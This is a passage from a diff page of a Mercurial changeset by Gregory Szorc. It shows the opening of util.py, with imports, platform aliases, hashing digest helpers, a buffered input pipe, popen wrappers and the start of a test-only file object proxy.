##// END OF EJS Templates
util: log readinto() I/O...
Gregory Szorc -
r36648:29128309 default
parent child Browse files
Show More
@@ -1,4045 +1,4054 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
162 try:
162 try:
163 recvfds = osutil.recvfds
163 recvfds = osutil.recvfds
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166 try:
166 try:
167 setprocname = osutil.setprocname
167 setprocname = osutil.setprocname
168 except AttributeError:
168 except AttributeError:
169 pass
169 pass
170 try:
170 try:
171 unblocksignal = osutil.unblocksignal
171 unblocksignal = osutil.unblocksignal
172 except AttributeError:
172 except AttributeError:
173 pass
173 pass
174
174
175 # Python compatibility
175 # Python compatibility
176
176
177 _notset = object()
177 _notset = object()
178
178
179 # disable Python's problematic floating point timestamps (issue4836)
179 # disable Python's problematic floating point timestamps (issue4836)
180 # (Python hypocritically says you shouldn't change this behavior in
180 # (Python hypocritically says you shouldn't change this behavior in
181 # libraries, and sure enough Mercurial is not a library.)
181 # libraries, and sure enough Mercurial is not a library.)
182 os.stat_float_times(False)
182 os.stat_float_times(False)
183
183
184 def safehasattr(thing, attr):
184 def safehasattr(thing, attr):
185 return getattr(thing, attr, _notset) is not _notset
185 return getattr(thing, attr, _notset) is not _notset
186
186
187 def _rapply(f, xs):
187 def _rapply(f, xs):
188 if xs is None:
188 if xs is None:
189 # assume None means non-value of optional data
189 # assume None means non-value of optional data
190 return xs
190 return xs
191 if isinstance(xs, (list, set, tuple)):
191 if isinstance(xs, (list, set, tuple)):
192 return type(xs)(_rapply(f, x) for x in xs)
192 return type(xs)(_rapply(f, x) for x in xs)
193 if isinstance(xs, dict):
193 if isinstance(xs, dict):
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return f(xs)
195 return f(xs)
196
196
197 def rapply(f, xs):
197 def rapply(f, xs):
198 """Apply function recursively to every item preserving the data structure
198 """Apply function recursively to every item preserving the data structure
199
199
200 >>> def f(x):
200 >>> def f(x):
201 ... return 'f(%s)' % x
201 ... return 'f(%s)' % x
202 >>> rapply(f, None) is None
202 >>> rapply(f, None) is None
203 True
203 True
204 >>> rapply(f, 'a')
204 >>> rapply(f, 'a')
205 'f(a)'
205 'f(a)'
206 >>> rapply(f, {'a'}) == {'f(a)'}
206 >>> rapply(f, {'a'}) == {'f(a)'}
207 True
207 True
208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210
210
211 >>> xs = [object()]
211 >>> xs = [object()]
212 >>> rapply(pycompat.identity, xs) is xs
212 >>> rapply(pycompat.identity, xs) is xs
213 True
213 True
214 """
214 """
215 if f is pycompat.identity:
215 if f is pycompat.identity:
216 # fast path mainly for py2
216 # fast path mainly for py2
217 return xs
217 return xs
218 return _rapply(f, xs)
218 return _rapply(f, xs)
219
219
220 def bytesinput(fin, fout, *args, **kwargs):
220 def bytesinput(fin, fout, *args, **kwargs):
221 sin, sout = sys.stdin, sys.stdout
221 sin, sout = sys.stdin, sys.stdout
222 try:
222 try:
223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 finally:
225 finally:
226 sys.stdin, sys.stdout = sin, sout
226 sys.stdin, sys.stdout = sin, sout
227
227
228 def bitsfrom(container):
228 def bitsfrom(container):
229 bits = 0
229 bits = 0
230 for bit in container:
230 for bit in container:
231 bits |= bit
231 bits |= bit
232 return bits
232 return bits
233
233
234 # python 2.6 still have deprecation warning enabled by default. We do not want
234 # python 2.6 still have deprecation warning enabled by default. We do not want
235 # to display anything to standard user so detect if we are running test and
235 # to display anything to standard user so detect if we are running test and
236 # only use python deprecation warning in this case.
236 # only use python deprecation warning in this case.
237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 if _dowarn:
238 if _dowarn:
239 # explicitly unfilter our warning for python 2.7
239 # explicitly unfilter our warning for python 2.7
240 #
240 #
241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 # However, module name set through PYTHONWARNINGS was exactly matched, so
242 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 if _dowarn and pycompat.ispy3:
248 if _dowarn and pycompat.ispy3:
249 # silence warning emitted by passing user string to re.sub()
249 # silence warning emitted by passing user string to re.sub()
250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
251 r'mercurial')
251 r'mercurial')
252
252
253 def nouideprecwarn(msg, version, stacklevel=1):
253 def nouideprecwarn(msg, version, stacklevel=1):
254 """Issue an python native deprecation warning
254 """Issue an python native deprecation warning
255
255
256 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
256 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
257 """
257 """
258 if _dowarn:
258 if _dowarn:
259 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
259 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
260 " update your code.)") % version
260 " update your code.)") % version
261 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
261 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
262
262
263 DIGESTS = {
263 DIGESTS = {
264 'md5': hashlib.md5,
264 'md5': hashlib.md5,
265 'sha1': hashlib.sha1,
265 'sha1': hashlib.sha1,
266 'sha512': hashlib.sha512,
266 'sha512': hashlib.sha512,
267 }
267 }
268 # List of digest types from strongest to weakest
268 # List of digest types from strongest to weakest
269 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
269 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
270
270
271 for k in DIGESTS_BY_STRENGTH:
271 for k in DIGESTS_BY_STRENGTH:
272 assert k in DIGESTS
272 assert k in DIGESTS
273
273
274 class digester(object):
274 class digester(object):
275 """helper to compute digests.
275 """helper to compute digests.
276
276
277 This helper can be used to compute one or more digests given their name.
277 This helper can be used to compute one or more digests given their name.
278
278
279 >>> d = digester([b'md5', b'sha1'])
279 >>> d = digester([b'md5', b'sha1'])
280 >>> d.update(b'foo')
280 >>> d.update(b'foo')
281 >>> [k for k in sorted(d)]
281 >>> [k for k in sorted(d)]
282 ['md5', 'sha1']
282 ['md5', 'sha1']
283 >>> d[b'md5']
283 >>> d[b'md5']
284 'acbd18db4cc2f85cedef654fccc4a4d8'
284 'acbd18db4cc2f85cedef654fccc4a4d8'
285 >>> d[b'sha1']
285 >>> d[b'sha1']
286 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
286 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
287 >>> digester.preferred([b'md5', b'sha1'])
287 >>> digester.preferred([b'md5', b'sha1'])
288 'sha1'
288 'sha1'
289 """
289 """
290
290
291 def __init__(self, digests, s=''):
291 def __init__(self, digests, s=''):
292 self._hashes = {}
292 self._hashes = {}
293 for k in digests:
293 for k in digests:
294 if k not in DIGESTS:
294 if k not in DIGESTS:
295 raise Abort(_('unknown digest type: %s') % k)
295 raise Abort(_('unknown digest type: %s') % k)
296 self._hashes[k] = DIGESTS[k]()
296 self._hashes[k] = DIGESTS[k]()
297 if s:
297 if s:
298 self.update(s)
298 self.update(s)
299
299
300 def update(self, data):
300 def update(self, data):
301 for h in self._hashes.values():
301 for h in self._hashes.values():
302 h.update(data)
302 h.update(data)
303
303
304 def __getitem__(self, key):
304 def __getitem__(self, key):
305 if key not in DIGESTS:
305 if key not in DIGESTS:
306 raise Abort(_('unknown digest type: %s') % k)
306 raise Abort(_('unknown digest type: %s') % k)
307 return nodemod.hex(self._hashes[key].digest())
307 return nodemod.hex(self._hashes[key].digest())
308
308
309 def __iter__(self):
309 def __iter__(self):
310 return iter(self._hashes)
310 return iter(self._hashes)
311
311
312 @staticmethod
312 @staticmethod
313 def preferred(supported):
313 def preferred(supported):
314 """returns the strongest digest type in both supported and DIGESTS."""
314 """returns the strongest digest type in both supported and DIGESTS."""
315
315
316 for k in DIGESTS_BY_STRENGTH:
316 for k in DIGESTS_BY_STRENGTH:
317 if k in supported:
317 if k in supported:
318 return k
318 return k
319 return None
319 return None
320
320
321 class digestchecker(object):
321 class digestchecker(object):
322 """file handle wrapper that additionally checks content against a given
322 """file handle wrapper that additionally checks content against a given
323 size and digests.
323 size and digests.
324
324
325 d = digestchecker(fh, size, {'md5': '...'})
325 d = digestchecker(fh, size, {'md5': '...'})
326
326
327 When multiple digests are given, all of them are validated.
327 When multiple digests are given, all of them are validated.
328 """
328 """
329
329
330 def __init__(self, fh, size, digests):
330 def __init__(self, fh, size, digests):
331 self._fh = fh
331 self._fh = fh
332 self._size = size
332 self._size = size
333 self._got = 0
333 self._got = 0
334 self._digests = dict(digests)
334 self._digests = dict(digests)
335 self._digester = digester(self._digests.keys())
335 self._digester = digester(self._digests.keys())
336
336
337 def read(self, length=-1):
337 def read(self, length=-1):
338 content = self._fh.read(length)
338 content = self._fh.read(length)
339 self._digester.update(content)
339 self._digester.update(content)
340 self._got += len(content)
340 self._got += len(content)
341 return content
341 return content
342
342
343 def validate(self):
343 def validate(self):
344 if self._size != self._got:
344 if self._size != self._got:
345 raise Abort(_('size mismatch: expected %d, got %d') %
345 raise Abort(_('size mismatch: expected %d, got %d') %
346 (self._size, self._got))
346 (self._size, self._got))
347 for k, v in self._digests.items():
347 for k, v in self._digests.items():
348 if v != self._digester[k]:
348 if v != self._digester[k]:
349 # i18n: first parameter is a digest name
349 # i18n: first parameter is a digest name
350 raise Abort(_('%s mismatch: expected %s, got %s') %
350 raise Abort(_('%s mismatch: expected %s, got %s') %
351 (k, v, self._digester[k]))
351 (k, v, self._digester[k]))
352
352
353 try:
353 try:
354 buffer = buffer
354 buffer = buffer
355 except NameError:
355 except NameError:
356 def buffer(sliceable, offset=0, length=None):
356 def buffer(sliceable, offset=0, length=None):
357 if length is not None:
357 if length is not None:
358 return memoryview(sliceable)[offset:offset + length]
358 return memoryview(sliceable)[offset:offset + length]
359 return memoryview(sliceable)[offset:]
359 return memoryview(sliceable)[offset:]
360
360
361 closefds = pycompat.isposix
361 closefds = pycompat.isposix
362
362
363 _chunksize = 4096
363 _chunksize = 4096
364
364
365 class bufferedinputpipe(object):
365 class bufferedinputpipe(object):
366 """a manually buffered input pipe
366 """a manually buffered input pipe
367
367
368 Python will not let us use buffered IO and lazy reading with 'polling' at
368 Python will not let us use buffered IO and lazy reading with 'polling' at
369 the same time. We cannot probe the buffer state and select will not detect
369 the same time. We cannot probe the buffer state and select will not detect
370 that data are ready to read if they are already buffered.
370 that data are ready to read if they are already buffered.
371
371
372 This class let us work around that by implementing its own buffering
372 This class let us work around that by implementing its own buffering
373 (allowing efficient readline) while offering a way to know if the buffer is
373 (allowing efficient readline) while offering a way to know if the buffer is
374 empty from the output (allowing collaboration of the buffer with polling).
374 empty from the output (allowing collaboration of the buffer with polling).
375
375
376 This class lives in the 'util' module because it makes use of the 'os'
376 This class lives in the 'util' module because it makes use of the 'os'
377 module from the python stdlib.
377 module from the python stdlib.
378 """
378 """
379 def __new__(cls, fh):
379 def __new__(cls, fh):
380 # If we receive a fileobjectproxy, we need to use a variation of this
380 # If we receive a fileobjectproxy, we need to use a variation of this
381 # class that notifies observers about activity.
381 # class that notifies observers about activity.
382 if isinstance(fh, fileobjectproxy):
382 if isinstance(fh, fileobjectproxy):
383 cls = observedbufferedinputpipe
383 cls = observedbufferedinputpipe
384
384
385 return super(bufferedinputpipe, cls).__new__(cls)
385 return super(bufferedinputpipe, cls).__new__(cls)
386
386
387 def __init__(self, input):
387 def __init__(self, input):
388 self._input = input
388 self._input = input
389 self._buffer = []
389 self._buffer = []
390 self._eof = False
390 self._eof = False
391 self._lenbuf = 0
391 self._lenbuf = 0
392
392
393 @property
393 @property
394 def hasbuffer(self):
394 def hasbuffer(self):
395 """True is any data is currently buffered
395 """True is any data is currently buffered
396
396
397 This will be used externally a pre-step for polling IO. If there is
397 This will be used externally a pre-step for polling IO. If there is
398 already data then no polling should be set in place."""
398 already data then no polling should be set in place."""
399 return bool(self._buffer)
399 return bool(self._buffer)
400
400
401 @property
401 @property
402 def closed(self):
402 def closed(self):
403 return self._input.closed
403 return self._input.closed
404
404
405 def fileno(self):
405 def fileno(self):
406 return self._input.fileno()
406 return self._input.fileno()
407
407
408 def close(self):
408 def close(self):
409 return self._input.close()
409 return self._input.close()
410
410
411 def read(self, size):
411 def read(self, size):
412 while (not self._eof) and (self._lenbuf < size):
412 while (not self._eof) and (self._lenbuf < size):
413 self._fillbuffer()
413 self._fillbuffer()
414 return self._frombuffer(size)
414 return self._frombuffer(size)
415
415
416 def readline(self, *args, **kwargs):
416 def readline(self, *args, **kwargs):
417 if 1 < len(self._buffer):
417 if 1 < len(self._buffer):
418 # this should not happen because both read and readline end with a
418 # this should not happen because both read and readline end with a
419 # _frombuffer call that collapse it.
419 # _frombuffer call that collapse it.
420 self._buffer = [''.join(self._buffer)]
420 self._buffer = [''.join(self._buffer)]
421 self._lenbuf = len(self._buffer[0])
421 self._lenbuf = len(self._buffer[0])
422 lfi = -1
422 lfi = -1
423 if self._buffer:
423 if self._buffer:
424 lfi = self._buffer[-1].find('\n')
424 lfi = self._buffer[-1].find('\n')
425 while (not self._eof) and lfi < 0:
425 while (not self._eof) and lfi < 0:
426 self._fillbuffer()
426 self._fillbuffer()
427 if self._buffer:
427 if self._buffer:
428 lfi = self._buffer[-1].find('\n')
428 lfi = self._buffer[-1].find('\n')
429 size = lfi + 1
429 size = lfi + 1
430 if lfi < 0: # end of file
430 if lfi < 0: # end of file
431 size = self._lenbuf
431 size = self._lenbuf
432 elif 1 < len(self._buffer):
432 elif 1 < len(self._buffer):
433 # we need to take previous chunks into account
433 # we need to take previous chunks into account
434 size += self._lenbuf - len(self._buffer[-1])
434 size += self._lenbuf - len(self._buffer[-1])
435 return self._frombuffer(size)
435 return self._frombuffer(size)
436
436
437 def _frombuffer(self, size):
437 def _frombuffer(self, size):
438 """return at most 'size' data from the buffer
438 """return at most 'size' data from the buffer
439
439
440 The data are removed from the buffer."""
440 The data are removed from the buffer."""
441 if size == 0 or not self._buffer:
441 if size == 0 or not self._buffer:
442 return ''
442 return ''
443 buf = self._buffer[0]
443 buf = self._buffer[0]
444 if 1 < len(self._buffer):
444 if 1 < len(self._buffer):
445 buf = ''.join(self._buffer)
445 buf = ''.join(self._buffer)
446
446
447 data = buf[:size]
447 data = buf[:size]
448 buf = buf[len(data):]
448 buf = buf[len(data):]
449 if buf:
449 if buf:
450 self._buffer = [buf]
450 self._buffer = [buf]
451 self._lenbuf = len(buf)
451 self._lenbuf = len(buf)
452 else:
452 else:
453 self._buffer = []
453 self._buffer = []
454 self._lenbuf = 0
454 self._lenbuf = 0
455 return data
455 return data
456
456
457 def _fillbuffer(self):
457 def _fillbuffer(self):
458 """read data to the buffer"""
458 """read data to the buffer"""
459 data = os.read(self._input.fileno(), _chunksize)
459 data = os.read(self._input.fileno(), _chunksize)
460 if not data:
460 if not data:
461 self._eof = True
461 self._eof = True
462 else:
462 else:
463 self._lenbuf += len(data)
463 self._lenbuf += len(data)
464 self._buffer.append(data)
464 self._buffer.append(data)
465
465
466 return data
466 return data
467
467
468 def mmapread(fp):
468 def mmapread(fp):
469 try:
469 try:
470 fd = getattr(fp, 'fileno', lambda: fp)()
470 fd = getattr(fp, 'fileno', lambda: fp)()
471 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
471 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
472 except ValueError:
472 except ValueError:
473 # Empty files cannot be mmapped, but mmapread should still work. Check
473 # Empty files cannot be mmapped, but mmapread should still work. Check
474 # if the file is empty, and if so, return an empty buffer.
474 # if the file is empty, and if so, return an empty buffer.
475 if os.fstat(fd).st_size == 0:
475 if os.fstat(fd).st_size == 0:
476 return ''
476 return ''
477 raise
477 raise
478
478
479 def popen2(cmd, env=None, newlines=False):
479 def popen2(cmd, env=None, newlines=False):
480 # Setting bufsize to -1 lets the system decide the buffer size.
480 # Setting bufsize to -1 lets the system decide the buffer size.
481 # The default for bufsize is 0, meaning unbuffered. This leads to
481 # The default for bufsize is 0, meaning unbuffered. This leads to
482 # poor performance on Mac OS X: http://bugs.python.org/issue4194
482 # poor performance on Mac OS X: http://bugs.python.org/issue4194
483 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
483 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
484 close_fds=closefds,
484 close_fds=closefds,
485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 universal_newlines=newlines,
486 universal_newlines=newlines,
487 env=env)
487 env=env)
488 return p.stdin, p.stdout
488 return p.stdin, p.stdout
489
489
490 def popen3(cmd, env=None, newlines=False):
490 def popen3(cmd, env=None, newlines=False):
491 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
491 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
492 return stdin, stdout, stderr
492 return stdin, stdout, stderr
493
493
494 def popen4(cmd, env=None, newlines=False, bufsize=-1):
494 def popen4(cmd, env=None, newlines=False, bufsize=-1):
495 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
495 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
496 close_fds=closefds,
496 close_fds=closefds,
497 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
497 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
498 stderr=subprocess.PIPE,
498 stderr=subprocess.PIPE,
499 universal_newlines=newlines,
499 universal_newlines=newlines,
500 env=env)
500 env=env)
501 return p.stdin, p.stdout, p.stderr, p
501 return p.stdin, p.stdout, p.stderr, p
502
502
503 class fileobjectproxy(object):
503 class fileobjectproxy(object):
504 """A proxy around file objects that tells a watcher when events occur.
504 """A proxy around file objects that tells a watcher when events occur.
505
505
506 This type is intended to only be used for testing purposes. Think hard
506 This type is intended to only be used for testing purposes. Think hard
507 before using it in important code.
507 before using it in important code.
508 """
508 """
509 __slots__ = (
509 __slots__ = (
510 r'_orig',
510 r'_orig',
511 r'_observer',
511 r'_observer',
512 )
512 )
513
513
514 def __init__(self, fh, observer):
514 def __init__(self, fh, observer):
515 object.__setattr__(self, r'_orig', fh)
515 object.__setattr__(self, r'_orig', fh)
516 object.__setattr__(self, r'_observer', observer)
516 object.__setattr__(self, r'_observer', observer)
517
517
518 def __getattribute__(self, name):
518 def __getattribute__(self, name):
519 ours = {
519 ours = {
520 r'_observer',
520 r'_observer',
521
521
522 # IOBase
522 # IOBase
523 r'close',
523 r'close',
524 # closed if a property
524 # closed if a property
525 r'fileno',
525 r'fileno',
526 r'flush',
526 r'flush',
527 r'isatty',
527 r'isatty',
528 r'readable',
528 r'readable',
529 r'readline',
529 r'readline',
530 r'readlines',
530 r'readlines',
531 r'seek',
531 r'seek',
532 r'seekable',
532 r'seekable',
533 r'tell',
533 r'tell',
534 r'truncate',
534 r'truncate',
535 r'writable',
535 r'writable',
536 r'writelines',
536 r'writelines',
537 # RawIOBase
537 # RawIOBase
538 r'read',
538 r'read',
539 r'readall',
539 r'readall',
540 r'readinto',
540 r'readinto',
541 r'write',
541 r'write',
542 # BufferedIOBase
542 # BufferedIOBase
543 # raw is a property
543 # raw is a property
544 r'detach',
544 r'detach',
545 # read defined above
545 # read defined above
546 r'read1',
546 r'read1',
547 # readinto defined above
547 # readinto defined above
548 # write defined above
548 # write defined above
549 }
549 }
550
550
551 # We only observe some methods.
551 # We only observe some methods.
552 if name in ours:
552 if name in ours:
553 return object.__getattribute__(self, name)
553 return object.__getattribute__(self, name)
554
554
555 return getattr(object.__getattribute__(self, r'_orig'), name)
555 return getattr(object.__getattribute__(self, r'_orig'), name)
556
556
557 def __delattr__(self, name):
557 def __delattr__(self, name):
558 return delattr(object.__getattribute__(self, r'_orig'), name)
558 return delattr(object.__getattribute__(self, r'_orig'), name)
559
559
560 def __setattr__(self, name, value):
560 def __setattr__(self, name, value):
561 return setattr(object.__getattribute__(self, r'_orig'), name, value)
561 return setattr(object.__getattribute__(self, r'_orig'), name, value)
562
562
563 def __iter__(self):
563 def __iter__(self):
564 return object.__getattribute__(self, r'_orig').__iter__()
564 return object.__getattribute__(self, r'_orig').__iter__()
565
565
566 def _observedcall(self, name, *args, **kwargs):
566 def _observedcall(self, name, *args, **kwargs):
567 # Call the original object.
567 # Call the original object.
568 orig = object.__getattribute__(self, r'_orig')
568 orig = object.__getattribute__(self, r'_orig')
569 res = getattr(orig, name)(*args, **kwargs)
569 res = getattr(orig, name)(*args, **kwargs)
570
570
571 # Call a method on the observer of the same name with arguments
571 # Call a method on the observer of the same name with arguments
